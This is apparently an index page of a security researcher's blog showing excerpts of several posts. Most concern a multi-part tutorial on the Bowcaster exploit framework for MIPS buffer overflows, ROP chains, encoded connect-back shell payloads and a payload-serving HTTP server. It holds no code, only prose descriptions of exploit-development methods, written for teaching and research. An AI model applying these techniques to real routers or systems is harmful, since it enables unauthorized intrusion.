The Shadow File

UPDATE: Turns out, Jacob Holocomb (@rootHak42 on Twitter) of Independent Security Evaluators found this bug back in April on a different device, the WNDR4700. Thanks for letting me know, Jacob. Nice find. Here’s a link to that report. UPDATE 2: Because there are almost certainly fools who would go hack somebody’s router and say I told them to do it, I added a warning to not do this. DON’T DO IT.

I’ve just added a module to Bowcaster that I think is cool. Actually, I just got around to finishing a module that was there all along. It’s a basic HTTP server module, but it has some unique features that make it suitable for serving payloads to remotely exploited targets. The connect-back server modules in Bowcaster are designed to run asynchronously so that they can be used right in line with your exploit code. Basically the model is this:

Update December 2014: 44CON has posted the videos from all 2013 talks online. Unfortunately, they don’t allow the videos to be embedded, so here’s a link. For my presentation at 44CON, entitled “Reversing and Exploiting BT CPE Devices”, rather than have one or two or three slides packed with hard to read URLs, I included a single slide with a link to this post. Here you’ll find links to additional resources that I may have referenced in my talk.

Note: I have a great job at a company called Tactical Network Solutions, based in Columbia, MD. I’m not looking for a new job. That’s not why I’m writing this post. I have way too much fun working with crazy smart people right where I am. I get a lot of recruiter email. Some are very thoughtful and are for companies that would be very cool to work for. I love those, and I want to high five those people for being such class acts. I try to always send them a thoughtful response thanking them for thinking of me, but letting them know I’m fine where I am.

Sometimes I need a MIPS Linux system that I can use for development and testing. Maybe I need to test some shellcode or debug a binary I’m analyzing. What I wish existed was a Raspberry Pi-like MIPS device. I’d love to have a bunch of small, sub-$50 devices that I could network together as a sort of desktop exploit lab. Unfortunately I don’t know of such a device. There is MIPS hardware you can get and install Linux on. I have a Cobalt RAQ, and a lot of people like to get a hackable WiFi router and image it with OpenWRT. But there’s nothing as small, cheap and convenient as the RPi that is MIPS.

Nothing original here, but this is a great tip, so I want to share it. Thanks to @thegrugq for cluing me into this via Twitter. For everyone running OS X 10.7 or 10.8 on their Macs (and really, EVERYONE should be on 10.8; the security benefits are non-trivial) and are using FileVault 2 to encrypt your filesystems (you are, right?) here’s a good tip I picked up the other day:

In previous parts of the Bowcaster tutorial, I showed how to construct your buffer overflow using the OverflowBuffer class. I also mentioned there is another class, EmptyOverflowBuffer, that I would explain later. That class is going to be the topic of this post. When I started development of Bowcaster, I created it for myself and for the way I develop exploits and think about buffer overflows. The OverflowBuffer class works the way I think. But when I talked to my colleague, Craig Heffner, about the project, Craig preferred a different API, I realized that we each think about the same problem in different ways.

In part 1 of the Bowcaster tutorial I showed how to generate an overflow string with the OverflowBuffer class. In part 2, I showed how to populate your your overflow string with ROP gadgets. In part 3, I showed how to add Bowcaster’s connect-back payload for MIPS Linux to your overflow string. I also showed how to encode your payload using Bowcaster’s MIPS Linux-specific XOR encoder in order to sanitize restricted bytes. Part 3 ended by using a netcat listener to serve a connect-back root shell. In this part I’ll show how to use one of Bowcaster’s server modules to replace netcat.

Crossbow has been renamed to Bowcaster. It turns out “Crossbow” is a popular word. Who knew? A company in California has the word registered as a trademark in the US in connection with computer software. They might be cool with us using the word, since this is an open-source, noncommercial product, but we’ve decided to change the name just in case. Hopefully the new name is esoteric enough to avoid any naming conflicts, while still being cool and fun to say. I left the original post as-is, save for an update note and a new Github link. The old Github project will stay up for a while, but you should use the new one from this point on.

This is the third part in a multi part tutorial on using the Bowcaster exploit development framework to build a buffer overflow exploit. Here are part 1 and part 2. In the last part, we had built an exploit buffer and added a ROP chain that would flush the MIPS CPU cache, locate the stack (which is randomized), and return into it. Now it’s time to add a payload. Bowcaster provides a few MIPS Linux payloads, and the one we’ll use for this buffer overflow is the connect-back payload, which will yield an interactive shell.